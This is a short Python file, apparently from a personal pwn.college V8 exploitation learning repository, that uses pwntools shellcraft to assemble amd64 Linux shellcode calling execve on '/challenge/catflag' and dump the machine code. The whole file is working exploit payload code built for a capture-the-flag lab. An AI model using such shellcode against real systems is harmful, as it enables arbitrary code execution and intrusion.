pwn-learning/JavaScript/PwnCollegeV8Exploitation/ShellCode/catflag.py

from pwn import context, shellcraft
from common import *
context(arch = 'amd64', os = 'linux')

# execve("/challenge/catflag", NULL, NULL)
assembly = f"""
/* Craft envp to rdx */
{shellcraft.amd64.push(0)}
{shellcraft.amd64.mov("rdx", "rsp")}
/* Craft argv to rsi */
{shellcraft.amd64.push(0)}
{shellcraft.amd64.mov("rsi", "rsp")}
/* Craft pathname to rdi */
{shellcraft.amd64.pushstr("/challenge/catflag")}
{shellcraft.amd64.mov("rdi", "rsp")}
/* syscall execve */
{shellcraft.amd64.linux.syscall("SYS_execve", "rdi", "rsi", "rdx")}
""".strip()

dump_machine_code(assembly)